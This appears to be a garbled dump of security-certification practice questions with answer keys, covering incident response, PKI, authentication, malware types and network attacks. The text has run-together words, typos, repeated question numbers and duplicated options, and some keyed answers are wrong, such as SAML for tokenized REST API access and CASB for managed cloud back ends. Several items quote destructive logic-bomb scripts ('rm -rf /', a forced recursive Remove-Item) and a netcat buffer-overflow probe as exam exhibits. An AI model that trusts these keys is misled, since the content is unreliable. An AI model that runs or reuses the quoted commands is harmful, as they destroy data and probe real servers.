QUESTION 2 Which of the following is the BEST reason for salting a password hash before it is stored in a database? A. To prevent duplicate values from being stored B. To make the password retrieval process very slow C. To protect passwords from being saved in readable format D. To prevent users from using simple passwords for their access credentials

Correct Answer: A

QUESTION 20Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability ina third-party software application?A. SandboxingB. EncryptionC. Code signingD. Fuzzing

Correct Answer: A

QUESTION 21A network administrator needs to allocate a new network for the R&D group. The network must not beaccessible from the Internet regardless of the network firewall or other external misconfigurations. Which of thefollowing settings should the network administrator implement to accomplish this?A. Configure the OS default TTL to 1B. Use NAT on the R&D networkC. Implement a router ACLD. Enable protected ports on the switch

Correct Answer: A

QUESTION 22 After a security incident, management is meeting with involved employees to document the incident and its aftermath. Which of the following BEST describes this phase of the incident response process? A. Lessons learned B. Recovery C. Identification D. Preparation

Correct Answer: A

QUESTION 25 A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING - hash mismatch: C:\Window\SysWOW64\user32.dllWARNING - hash mismatch: C:\Window\SysWOW64\kernel32.dllBased solely on the above information, which of the following types of malware is MOST likely installed on the system? A. Rootkit B. Ransomware C. Trojan D. Backdoor

Correct Answer: A

QUESTION 25An analyst receives an alert from the SIEM showing an IP address that does not belong to the assignednetwork can be seen sending packets to the wrong gateway. Which of the following network devices ismisconfigured and which of the following should be done to remediate the issue?A. Firewall; implement an ACL on the interfaceB. Router; place the correct subnet on the interfaceC. Switch; modify the access port to trunk portD. Proxy; add the correct transparent interface

Correct Answer: A

QUESTION 28 An incident involving a workstation that is potentially infected with a virus has occurred. The workstation may have sent confidential data to an unknown internet server. Which of the following should a security analyst do FIRST? A. Make a copy of everything in memory on the workstation. B. Turn off the workstation. C. Consult the information security policy. D. Run a virus scan.

Correct Answer: A

QUESTION 29A Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a specificversion of a technology the company uses to support many critical application. The CIO wants to know if thisreported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Whichof the following would BEST provide the needed information?A. Penetration testB. Vulnerability scanC. Active reconnaissanceD. Patching assessment report

Correct Answer: A

QUESTION 3 An actor downloads and runs a program against a corporate login page. The program imports a list of usernames and passwords, looking for a successful attempt. Which of the following terms BEST describes the actor in this situation? A. Script kiddie B. Hacktivist C. Cryptologist D. Security auditor

Correct Answer: A

QUESTION 10 A security analyst is updating a BIA document. The security analyst notices the support vendor's time to replace a server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be concluded? (Select TWO) A. The MTTR is faster. B. The MTTR is slower. C. The RTO has increased. D. The RTO has decreased. E. The MTTF has increased. F. The MTTF has decreased.

Correct Answer: AD

QUESTION 36A systems administrator wants to provide balance between the security of a wireless network and usability. Theadministrator is concerned with wireless encryption compatibility of older devices used by some employees.Which of the following would provide strong security backward compatibility when accessing the wirelessnetwork?A. Open wireless network and SSL VPNB. WPA using a preshared keyC. WAP2 using a RADIUS back-end for 802.1x authenticationD. WEP with a 40-bit key

Correct Answer: A

QUESTION 37Company A agrees to provide perimeter protection, power, and environmental support with measurable goalsfor Company B, but will not be responsible for user authentication or patching of operating systems within theperimeter. Which of the following is being described?A. Service level agreementB. Memorandum of understandingC. Business partner agreementD. Interoperability agreement

Correct Answer: A

QUESTION 39After a user reports slow computer performance, a systems administrator detects a suspicious file, which wasinstalled as part of a freeware software package. The systems administrator reviews the output below:c:\Windows\system32>netstat -nabActive ConnectionsPronto Local Address Foreign Address StateTCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe]TCP 0.0.0.0:445 0.0.0.0 [svchost.exe]TCP 192.168.1.10:5000 10.37.213.20 winserver.exeUDP 192.168.1.10:1900 *.* SSDPSVRBased on the above information, which of the following types of malware was installed on the user's computer?A. RATB. KeyloggerC. SpywareD. WormE. Bot

Correct Answer: A

QUESTION 4 An organization wants to utilize a common, Internet-based third-party provider for authorization and authentication. The provider uses a technology based on OAuth 2.0 to provide the required services. To which of the following technologies is the provider referring? A. OpenID Connect B. SAML C. XACML D. LDAP

Correct Answer: A

QUESTION 40An organization has several production-critical SCADA supervisory systems that cannot follow the normal 30-day patching policy. Which of the following BEST maximizes the protection of these systems from malicioussoftware?A. Configure a firewall with deep packet inspection that restricts traffic to the systems.B. Configure a separate zone for the systems and restrict access to known ports.C. Configure the systems to ensure only necessary applications are able to run.D. Configure the host firewall to ensure only the necessary applications have listening ports.

Correct Answer: A

QUESTION 42Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe, decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely causedthe data breach? A. Policy violation B. Social engineering C. Insider threat D. Zero-day attack

Correct Answer: A

QUESTION 43A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve thecompany's security posture quickly with regard to targeted attacks. Which of the following should the CSOconduct FIRST?A. Survey threat feeds from services inside the same industry.B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic.C. Conduct an internal audit against industry best practices to perform a qualitative analysis.D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.

Correct Answer: A

QUESTION 43An information security specialist is reviewing the following output from a Linux server:user@server:~$ -l5 * * * * /usr/local/bin.backup.shuser@server:~$ cat /usr/local/bin/backup.sh#!/bin/bashif ! grep --quiet joeuser /etc/passwdthe rm -rf /fiBased on the above information, which of the following types of malware was installed on the server?A. Logic bombB. TrojanC. BackdoorD. RansomwareE. Rootkit

Correct Answer: A

QUESTION 44A company wants to ensure confidential data from storage media is sanitized in such a way that the drivecannot be reused. Which of the following method should the technician use?A. ShreddingB. WipingC. Low-level formattingD. RepartitioningE. Overwriting

Correct Answer: A

QUESTION 44During a routine vulnerability assessment, the following command was successful:echo "vrfy 'perl -e 'print "hi" x 500 ' ' " | nc www.company.com 25Which of the following vulnerabilities is being exploited?A. Buffer overflow directed at a specific host MTAB. SQL injection directed at a web serverC. Cross-site scripting directed at www.company.comD. Race condition in a UNIX shell script

Correct Answer: A

QUESTION 46A company offers SaaS, maintaining all customers' credentials and authenticating locally. Many largecustomers have requested the company offer some form of federation with their existing authenticationinfrastructures. Which of the following would allow customers to manage authentication and authorizations fromwithin their existing organizations?A. Implement SAML so the company's services may accept assertions from the customers' authenticationservers.B. Provide customers with a constrained interface to manage only their users' accounts in the company'sactive directory server.C. Provide a system for customers to replicate their users' passwords from their authentication service to thecompany's.D. Use SOAP calls to support authentication between the company's product and the customers'authentication servers.

Correct Answer: A

QUESTION 48Following the successful response to a data-leakage incident, the incident team lead facilitates an exercise thatfocuses on continuous improvement of the organization's incident response capabilities. Which of the followingactivities has the incident team lead executed?A. Lessons learned reviewB. Root cause analysisC. Incident auditD. Corrective action exercise

Correct Answer: A

QUESTION 49A security analyst is attempting to break into a client's secure network. The analyst was not given priorinformation about the client, except for a block of public IP addresses that are currently in use. After networkenumeration, the analyst's NEXT step is to perform:A. a gray-box penetration test.B. a risk analysis.C. a vulnerability assessment.D. an external security audit.E. a red team exercise.

Correct Answer: A

QUESTION 49User from two organizations, each with its own PKI, need to begin working together on a joint project. Which ofthe following would allow the users of the separate PKIs to work together without connection errors?A. Trust modelB. StaplingC. Intermediate CAD. Key escrow

Correct Answer: A

FTPS

File Transfer Protocol Secure. An extension of FTP that uses SSL or TLS to encrypt FTP traffic. Some implementations of FTPS use ports 989 and 990.

QUESTION 51After a recent internal breach, a company decided to regenerate and reissue all certificates used in thetransmission of confidential information. The company places the greatest importance on confidentiality andnon-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describeshow the company will use these certificates?A. One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.B. One key pair will be used for encryption. The other key pair will provide extended validation.C. Data will be encrypted once by each key, doubling the confidentiality and non-repudiation strength.D. One key pair will be used for internal communication, and the other will be used for externalcommunication.

Correct Answer: A

QUESTION 52A security analyst is reviewing an assessment report that includes software versions, running services,supported encryption algorithms, and permission settings. Which of the following produced the report?A. Vulnerability scannerB. Protocol analyzerC. Network mapperD. Web inspector

Correct Answer: A

QUESTION 53A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any fundson malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infectionfor a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE valueswarrants a recommendation against purchasing the malware protection?A. $500B. $1000C. $2000D. $2500

Correct Answer: A

QUESTION 53A network administrator at a small office wants to simplify the configuration of mobile clients connecting to anencrypted wireless network. Which of the following should be implemented if the administrator does not want toprovide the wireless password or certificate to the employees?A. WPSB. 802.1xC. WPA2-PSKD. TKIP

Correct Answer: A

QUESTION 57Which of the following BEST describes a network-based attack that can allow an attacker to take full control ofa vulnerable host?A. Remote exploitB. AmplificationC. SniffingD. Man-in-the-middle

Correct Answer: A

QUESTION 58Two users must encrypt and transmit large amounts of data between them. Which of the following should theyuse to encrypt and transmit the data?A. Symmetric algorithmB. Hash functionC. Digital signatureD. Obfuscation

Correct Answer: A

QUESTION 5Which of the following threat actors is MOST likely to steal a company's proprietary information to gain amarket edge and reduce time to market?A. CompetitorB. HacktivistC. InsiderD. Organized crime

Correct Answer: A

QUESTION 62An application was recently compromised after some malformed data came in via web form. Which of thefollowing would MOST likely have prevented this?A. Input validationB. Proxy serverC. Stress testingD. Encoding

Correct Answer: A

QUESTION 63While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstationfrom the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of thefollowing incident response steps is Joe working on now?A. RecoveryB. EradicationC. ContainmentD. Identification

Correct Answer: A

QUESTION 64A systems administrator found a suspicious file in the root of the file system. The file contains URLs,usernames, passwords, and text from other documents being edited on the system. Which of the followingtypes of malware would generate such a file?A. KeyloggerB. RootkitC. BotD. RAT

Correct Answer: A

QUESTION 65A computer emergency response team is called at midnight to investigate a case in which a mail server wasrestarted. After an initial investigation, it was discovered that email is being exfiltrated through an activeconnection. Which of the following is the NEXT step the team should take?A. Identify the source of the active connectionB. Perform eradication of active connection and recoverC. Performance containment procedure by disconnecting the serverD. Format the server and restore its initial configuration

Correct Answer: A

QUESTION 65Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacysystem?A. Passive scanB. Aggressive scanC. Credentialed scanD. Intrusive scan

Correct Answer: A

QUESTION 66A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is lookingfor information about software versions on the network. Which of the following techniques is the intruder using?A. Banner grabbingB. Port scanningC. Packet sniffingD. Virus scanning

Correct Answer: A

QUESTION 66Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromiseif they are improperly configured?A. Embedded web serverB. SpoolerC. Network interfaceD. LCD control panel

Correct Answer: A

QUESTION 67A hacker has a packet capture that contains:....Joe Smith.........E289F21CD33E4F57890DDEA5CF267ED2.....Jane.Doe...........AD1FAB10D33E4F57890DDEA5CF267ED2......John.Key..........3374E9E7E33E4F57890DDEA5CF267ED2..Which of the following tools will the hacker use against this type of capture?A. Password crackerB. Vulnerability scannerC. DLP scannerD. Fuzzer

Correct Answer: A

QUESTION 68A user downloads and installs an MP3 converter, and runs the application. Upon running the application, theantivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?A. RATB. WormC. RansomwareD. Bot

Correct Answer: A

QUESTION 69A security technician is configuring an access management system to track and record user actions. Which ofthe following functions should the technician configure?A. AccountingB. AuthorizationC. AuthenticationD. Identification

Correct Answer: A

QUESTION 70A security analyst is securing smartphones and laptops for a highly mobile workforce. Priorities include:Remote wipe capabilitiesGeolocation servicesPatch management and reportingMandatory screen locksAbility to require passcodes and pinsAbility to require encryptionWhich of the following would BEST meet these requirements?A. Implementing MDM softwareB. Deploying relevant group policies to the devicesC. Installing full device encryptionD. Removing administrative rights to the devices

Correct Answer: A

FTP

File Transfer Protocol. Used to upload and download files to an FTP server. FTP uses ports 20 and 21. Secure FTP (SFTP) uses SSH for encryption on port 22. FTP Secure (FTPS) uses SSL or TLS for encryption.

QUESTION 71A technician receives a device with the following anomalies:Frequent pop-up adsShow response-time switching between active programsUnresponsive peripheralsThe technician reviews the following log file entries:File Name Source MD5 Target MD5Statusantivirus.exe F794F21CD33E4F57890DDEA5CF267ED2F794F21CD33E4F57890DDEA5CF267ED2 Automaticiexplore.exe 7FAAF21CD33E4F57890DDEA5CF29CCEAAA87F21CD33E4F57890DDEAEE2197333 Automaticservice.exe 77FF390CD33E4F57890DDEA5CF28881F77FF390CD33E4F57890DDEA5CF28881F ManualUSB.exe E289F21CD33E4F57890DDEA5CF28EDC0E289F21CD33E4F57890DDEA5CF28EDC0 StoppedBased on the above output, which of the following should be reviewed?A. The web application firewallB. The file integrity checkC. The data execution preventionD. The removable media control

Correct Answer: A

QUESTION 73A technician is investigating a potentially compromised device with the following symptoms:Browser slownessFrequent browser crashesHourglass stuckNew search toolbarIncreased memory consumptionWhich of the following types of malware has infected the system?A. Man-in-the-browserB. SpooferC. SpywareD. Adware

Correct Answer: A

QUESTION 73An organization plans to implement multifactor authentication techniques within the enterprise networkarchitecture. Each authentication factor is expected to be a unique control. Which of the following BESTdescribes the proper employment of multifactor authentication?A. Proximity card, fingerprint scanner, PINB. Fingerprint scanner, voice recognition, proximity cardC. Smart card, user PKI certificate, privileged user certificateD. Voice recognition, smart card, proximity card

Correct Answer: A

QUESTION 8 A web developer improves client access to the company's REST API. Authentication needs to be tokenized but not expose the client's password. Which of the following methods would BEST meet the developer's requirements? A. SAML B. LDAP C. OAuth D. Shibboleth

Correct Answer: A

QUESTION 84A systems administrator has isolated an infected system from the network and terminated the maliciousprocess from executing. Which of the following should the administrator do NEXT according to the incidentresponse process?A. Restore lost data from a backup.B. Wipe the system.C. Document the lessons learned.D. Determine the scope of impact.

Correct Answer: A

QUESTION 8Which of the following differentiates a collision attack from a rainbow table attack?A. A rainbow table attack performs a hash lookup.B. A rainbow table attack uses the hash as a password.C. In a collision attack, the hash and the input data are equivalent.D. In a collision attack, the same input results in different hashes.

Correct Answer: A

QUESTION 97 Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred? A. Ransomware B. Keylogger C. Buffer overflow D. Rootkit

Correct Answer: A

QUESTION 9A security analyst observes the following events in the logs of an employee workstation:1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administratorby the default restriction policy level.1/23 1:07:09 1034 The scan is completed. No detections were found.The security analyst reviews the file system and observes the following:C:\>dirC:\Users\user\temp1/23 1:07:02 oasdfkh.hta1/23 1:07:02 update.bat1/23 1:07:02 msg.txtGiven the information provided, which of the following MOST likely occurred on the workstation?A. Application whitelisting controls blocked an exploit payload from executing.B. Antivirus software found and quarantined three malware files.C. Automatic updates were initiated but failed because they had not been approved.D. The SIEM log aged was not tuned properly and reported a false positive.

Correct Answer: A

QUESTION 134A user suspects someone has been accessing a home network without permission by spoofing the mac address of an authorized system. While attempting to determine if an unauthorized user is logging into the home network, the user reviews the wireless router, which shows the following table for systems that are currently on the home network: Hostname IP Address MAC Filter Dad PC 192.168.1.15 00:1D:1A:44:17:B5 On Mom PC 192.168.1.15 21:13:D6:C5:42:A2 Off Junior PC 192.168.2.16 42:A7:D1:25:11:52 On Unknown 192.168.1.18 10:B3:22:1A:FF:21 Off Which of the following should be the NEXT step to determine if there is an unauthorized user on the network? A. Apply MAC filtering and see if the router drops any of the systems B. Physically check each of the authorized systems to determine if they are logged onto the network C. Deny the "unknown" host because the hostname is not known and MAC filtering is not applied to this host D. Conduct a ping sweep of each of the authorized systems and see if an echo response is received

Correct Answer: A Dad's PC and Mom's PC have the same IP address. One of them is doing ARP spoofing.

QUESTION 131An organization has implemented an IPSec VPN access for remote users. Which of the following IPSec modes would be the MOST secure for this organization to implement? A. Tunnel mode B. Transport mode C. AH-only mode D. ESP-only mode

Correct Answer: A In both ESP and AH cases with IPSec Transport mode, the IP header is exposed. The IP header is not exposed in IPSec Tunnel mode.

QUESTION 124Users report the following message appears when browsing to the company's secure site: This website can not be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select TWO) A. Verify the certificate has not expired on the server B. Ensure the certificate has a .pfx extension on the server C. Update the root certificate into the client computer certificate store D. Install the updated private key on the webserver E. Have users clear their browsing history and re-launch the session

Correct Answer: AC

QUESTION 3A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is tooccur. The administrator has been given the following requirements:*All access must be correlated to a user account.*All user accounts must be assigned to a single individual.*User access to the PHI data must be recorded.*Anomalies in PHI data access must be reported.*Logs and records cannot be deleted or modified.Which of the following should the administrator implement to meet the above requirements? (Select THREE).A. Eliminate shared accounts.B. Create a standard naming convention for accounts.C. Implement usage auditing and review.D. Enable account lockout thresholds.E. Copy logs in real time to a secured WORM drive.F. Implement time-of-day restrictions.G. Perform regular permission audits and reviews.

Correct Answer: ACE

GPG

GNU Privacy Guard (GPG). Free software that is based on the OpenPGP standard. It is similar to PGP but avoids any conflict with existing licensing by using open standards.

QUESTION 57A security administrator has found a hash in the environment known to belong to malware. The administratorthen finds this file to be in the preupdate area of the OS, which indicated it was pushed from the central patchsystem.File: winx86_adobe_upgrade.exeHash: 99ac28bede43ab869b853ba62c4ea243Administrator pulls a report from the patch management system with the following output:Install Date Package Name Target Device Hash10/10/2017 java_11.2_x64.exe HQ PC's 01ab28bbde63aa879b35bba62cdea28210/10/2017 winx86_adobe_flash_upgrade.exe HQ PC's 99ac28bede43ab86b853ba62c4ea243Given the above output, which of the following MOST likely happened?A. The file was corrupted after it left the patch systemB. The file was infected when the patch manager downloaded itC. The file was not approved in the application whitelist systemD. The file was embedded with a logic bomb to evade detection

Correct Answer: B

QUESTION 59A security analyst has received the following alert snippet from the HIDS appliance:PROTOCOL SIG SRC.PORT DST.PORTTCP XMAS SCAN 192.168.1.1:1091 192.168.1.2:8891TCP XMAS SCAN 192.168.1.1:649 192.168.1.2:9001TCP XMAS SCAN 192.168.1.1:2264 192.168.1.2:6455TCP XMAS SCAN 192.168.1.1:3464 192.168.1.2:8744Given the above logs, which of the following is the cause of the attack?A. The TCP ports on destination are all open.B. FIN, URG, and PSH flags are set in the packet header.C. TCP MSS is configured improperly.D. There is improper Layer 2 segmentation.

Correct Answer: B

QUESTION 60A software developer is concerned about DLL hijacking in an application being written. Which of the following isthe MOST viable mitigation measure of this type of attack?A. The DLL of each application should be set individuallyB. All calls to different DLLs should be hard-coded in the applicationC. Access to DLLs from the Windows registry should be disabledD. The affected DLLs should be renamed to avoid future hijacking

Correct Answer: B

QUESTION 62After attempting to harden a web server, a security analyst needs to determine if an application remainsvulnerable to SQL injection attacks. Which of the following would BEST assist the analyst in making thisdetermination?A. tracertB. FuzzerC. nslookupD. NmapE. netcat

Correct Answer: B

QUESTION 67An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to aWindows server. Given the following code:void foo (char *bar){car random_user_input[12];stropy (random_user_input, bar);}Which of the following vulnerabilities is present?A. Bad memory pointerB. Buffer overflowC. Integer overflowD. Backdoor

Correct Answer: B

QUESTION 7 Which of the following is the BEST choice for a security control that represents a preventive and corrective logical control at the same time? A. Security awareness training B. Antivirus C. Firewalls D. Intrusion detection system

Correct Answer: B

QUESTION 78A company has two wireless networks utilizing captive portals. Some employees report getting a trust error intheir browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details: Certificate 1Certificate Path: Geotrust Global CA*company.com Certificate 2Certificate Path:*company.com Which of the following would resolve the problem? A. Use a wildcard certificate. B. Use certificate chaining. C. Use a trust model. D. Use an extended validation certificate.

Correct Answer: B

QUESTION 79Company A has acquired Company B. Company A has different domains spread globally, and typically migrates its acquisitions infrastructure under its own domain infrastructure. Company B, however, cannot be merged into Company A's domain infrastructure. Which of the following methods would allow the two companies to access one another's resources? A. Attestation B. Federation C. Single sign-on D. Kerberos

Correct Answer: B

QUESTION 82An organization's employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal? A. Transitive trust B. Single sign-on C. Federation D. Secure token

Correct Answer: B

QUESTION 83An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacksis described?A. ReplayB. SpoofingC. DNS poisoningD. Client-side attack

Correct Answer: B

QUESTION 88Which of the following is a deployment concept that can be used to ensure only the required OS access isexposed to software applications?A. Staging environmentB. SandboxingC. Secure baselineD. Trusted OS

Correct Answer: B

QUESTION 91Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test?A. Black box B. Gray boxC. Credentialed D. White box

Correct Answer: B

QUESTION 92 Which of the following threats has sufficient knowledge to cause the MOST danger to an organization? A. Competitors B. Insiders C. Hacktivists D. Script kiddies

Correct Answer: B

QUESTION 93 While troubleshooting a client application connecting to the network, the security administrator notices the following error: Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is valid? A. PKIB. CRLC. CSRD. IPSec

Correct Answer: B

QUESTION 98Every morning, a systems administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement? A. Role-based access control B. Honeypot C. Rule-based access control D. Password cracker

Correct Answer: B

QUESTION 99Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file? A. Unencrypted credentials B. Authentication issues C. Weak cipher suite D. Permission issues

Correct Answer: B

You must authenticate with a unique username and password before being able to associate with the wireless access points. Which of the following wireless features would be most appropriate to achieve this objective? a. WPA b. WPA2 PSK c. WPA2-CCMP d. WPS

Correct Answer: B

QUESTION 118Due to regulatory requirements, server in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization? A. The server should connect to external Stratum 0 NTP servers for synchronization B. The server should connect to internal Stratum 0 NTP servers for synchronization C. The server should connect to external Stratum 1 NTP servers for synchronization D. The server should connect to external Stratum 1 NTP servers for synchronization

Correct Answer: B Configure your own Internal NTP hierarchical service for your network. It is possible to purchase Stratum 1 or Stratum 0 NTP appliances to use internally for less than the cost of a typical server. It is also possible to set up a private NTP server at a very low cost. The feasibility of setting up a commercial off the shelf (COTS) NTP server is evidenced in a recent effort to configure a Raspberry Pi computer as a Stratum-1 server. If you do decide to configure your own, please consider the following best practices: Standardize to UTC time. Within an enterprise, standardize all systems to coordinated universal time (UTC). Standardizing to UTC simplifies log correlation within the organization and with external parties no matter what time zone the device being synchronized is located in. Securing the network time service. Restrict the commands that can be used on the stratum servers. Do not allow public queries of the stratum servers. Only allow known networks/hosts to communicate with their respective stratum servers. Consider the business need for cryptography. Many administrators try to secure their networks with encrypted communications and encrypted authentication. I would introduce a note of caution here because although there are cryptographic services associated with NTP for securing NTP communications, the use of encryption introduces more sources for problems, such as requiring key management, and it also requires a higher computational overhead. Remember Segal's Law. Ideally, it would work to have three or more Stratum 0 or Stratum 1 servers and use those servers as primary masters. Remember Segal's Law: having two NTP servers makes it hard to know which one is accurate. Two Stratum 0 servers would provide a more accurate timestamp because they are using a time source that is considered definitive.

QUESTION 143 A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed? A. Aggressive scan B. Passive scan C. non-credentialed scan D. Compliance scan

Correct Answer: B Passive scanning is a method of vulnerability detection that relies on information gleaned from network data that is captured from a target computer without direct interaction. Packet sniffing applications can be used for passive scanning to reveal information such as operating system, known protocols running on non-standard ports and active network applications with known bugs. Passive scanning may be conducted by a network administrator scanning for security vulnerabilities or by an intruder as a preliminary to an active attack. For an intruder, passive scanning's main advantage is that it does not leave a trail that could alert users or administrators to their activities. For an administrator, the main advantage is that it doesn't risk causing undesired behavior on the target computer, such as freezes. Because of these advantages, passive scanning need not be limited to a narrow time frame to minimize risk or disruption, which means that it is likely to return more information. Passive scanning does have limitations. It is not as complete in detail as active vulnerability scanning and can not detect any applications that are not currently sending out traffic; nor can it distinguish false information put out for obfuscation.

QUESTION 19 An organization recently moved its custom web applications to the cloud, and it is obtaining managed services of the back-end environment as part of its subscription. Which of the following types of services is this company now using? A. SaaS B. CASB C. IaaS D. PaaS

Correct Answer: B Security Broker (CASB) gives you both visibility into your entire cloud stack and the security automation tool your IT team needs.

QUESTION 117Which of the following metrics are used to calculate the SLE? (Select TWO) A. ROI B. ARO C. ALE D. MTBF E. MTTF F. TCO

Correct Answer: BC

QUESTION 16 Which of the following are used to increase the computing time it takes to brute force a password using an offline attack? (Select TWO) A. XOR B. PBKDF2 C. bcrypt D. HMAC E. RIPEMD

Correct Answer: BC

QUESTION 18 A security administrator needs to address the following audit recommendations for a public-facing SFTP server: Users should be restricted to upload and download files to their own home directories only. Users should not be allowed to use an interactive shell login. Which of the following configuration parameters should be implemented? (Select TWO).A. Permit Tunnel B. Chroot Directory C. Permit TTY D. Allow TCP Forwarding E. Ignore Rhosts

Correct Answer: BC

QUESTION 19A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items.Which of the following BEST describe why this has occurred? (Select TWO)A. Privileged-user certificated were used to scan the hostB. Non-applicable plug ins were selected in the scan policyC. The incorrect audit file was usedD. The output of the report contains false positivesE. The target host has been compromised

Correct Answer: BC

QUESTION 52A security manager is creating an account management policy for a global organization with sales personnelwho must access corporate network resources while traveling all over the world. Which of the followingpractices is the security manager MOST likely to enforce with the policy? (Select TWO)A. Time-of-day restrictionsB. Password complexityC. Location-based authenticationD. Group-based access controlE. Standard naming convention

Correct Answer: BC

QUESTION 54A security administrator learns that PII, which was gathered by the organization, has been found in an openforum. As a result, several C-level executives found their identities were compromised, and they were victims ofa recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO).A. Implement a reverse proxy.B. Implement an email DLP.C. Implement a spam filter.D. Implement a host-based firewall.E. Implement a HIDS.

Correct Answer: BC

QUESTION 76When attempting to secure a mobile workstation, which of the following authentication technologies rely on theuser's physical characteristics? (Select TWO)A. MAC address tableB. Retina scanC. Fingerprint scanD. Two-factor authenticationE. CAPTCHAF. Password string

Correct Answer: BC

QUESTION 11 Which of the following could help detect trespassers in a secure facility? (Select TWO) A. Faraday cages B. Motion-detection sensors C. Tall, chain-link fencing D. Security guards E. Smart cards

Correct Answer: BD

QUESTION 140A manager wants to distribute a report to several other managers within the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (select three) A. S/MIME B. SSH C. SNMPv3 D. FTPS E. SRTP F. HTTPS G. LDAPS

Correct Answer: BDF

QUESTION 31 A manager wants to distribute a report to several other managers with the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size of the report is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE) A. S/MIME B. SSH C. SNMPv3 D. FTPS E. SRTP F. HTTPS G. LDAPS

Correct Answer: BDF

QUESTION 114A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized. Which of the following solutions would BEST meet these requirements? (Choose Two) A. Multifactor authentication B. SSO C. Biometrics D. PKI E. Federation

Correct Answer: BE

QUESTION 11A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The mainculprit of CPU utilization is the antivirus program. Which of the following issue could occur if left unresolved?(Select TWO)A. MITM attackB. DoS attackC. DLL injectionD. Buffer overflowE. Resource exhaustion

Correct Answer: BE

QUESTION 18A security administrator has written a script that will automatically upload binary and text-based configurationfiles onto a remote server using a scheduled task. The configuration files contain sensitive information. Whichof the following should the administrator use? (Select TWO)A. TOPTB. SCPC. FTP over a non-standard potD. SRTPE. Certificate-based authenticationF. SNMPv3

Correct Answer: BE

QUESTION 90Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann'saccess and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system andnotices the following output:2017--08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE2017--08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 -------- RECEIVEWhich of the following is MOST likely preventing Ann from accessing the application from the desktop?A. Web application firewallB. DLPC. Host-based firewallD. UTME. Network-based firewall

Correct Answer: BWebmail is being blocked. The 250 response code is for SMTP.

QUESTION 104A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server:$members = GetADGroupMemeber -Identity "Domain Admins" -Recursive | Select -ExpandProperty name if ($members -not contains "JohnDoe"){Remove-Item -path C:\Database -recurse -force}Which of the following did the security administrator discover? A. Ransomeware B. Backdoor C. Logic bomb D. Trojan

Correct Answer: C

QUESTION 110A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals outside of the premises? A. Air gap B. Infrared detection C. Faraday cage D. Protected distributions

Correct Answer: C

QUESTION 112A help desk technician receives a phone call from an individual claiming to be an employee of the organizationand requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing? A. Phishing B. Shoulder surfing C. Impersonation D. Dumpster diving

Correct Answer: C

QUESTION 116Which of the following authentication concepts is a gait analysis MOST closely associated? A. Somewhere you are B. Something you are C. Something you do D. Something you know

Correct Answer: C

QUESTION 119When sending messages using symmetric encryption, which of the following must happen FIRST? A. Exchange encryption key B. Establish digital signatures C. Agree on an encryption method D. Install digital certificates

Correct Answer: C

QUESTION 12 The IT department is deploying new computers. To ease the transition, users will be allowed to access their old and new systems. The help desk is receiving reports that users are experiencing the following error when attempting to log in to their previous system: Logon Failure: Access Denied Which of the following can cause this issue? A. Permission issues B. Access violations C. Certificate issues D. Misconfigured devices

Correct Answer: C

